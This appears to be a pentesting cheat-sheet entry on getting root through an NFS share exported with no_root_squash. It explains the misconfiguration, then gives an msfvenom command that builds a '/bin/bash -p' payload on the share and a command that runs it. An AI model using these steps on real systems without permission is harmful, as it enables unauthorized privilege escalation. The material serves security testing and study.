# NFS NO ROOT SQUASH

Mount NFS locally and gain root through activated `no_root_squash`.

When "no_root_squash" is enabled on an NFS share, it means that the "root" user
from the client system retains its full privileges when interacting with files
on the NFS share. In other words, any actions performed by the "root" user on
the client system are replicated with full permissions on the NFS server. This
can potentially lead to a security vulnerability, especially if the client
system is compromised or maliciously manipulated.

## Exploit

### Craft a Shell

Craft a shell and execute it on the NFS share which has `no_root_squash`
enabled to gain root privilege.

```sh
msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf
```

After the shell has been created on or copied to the share, execute it on the
target share

```sh
./shell.elf -p
```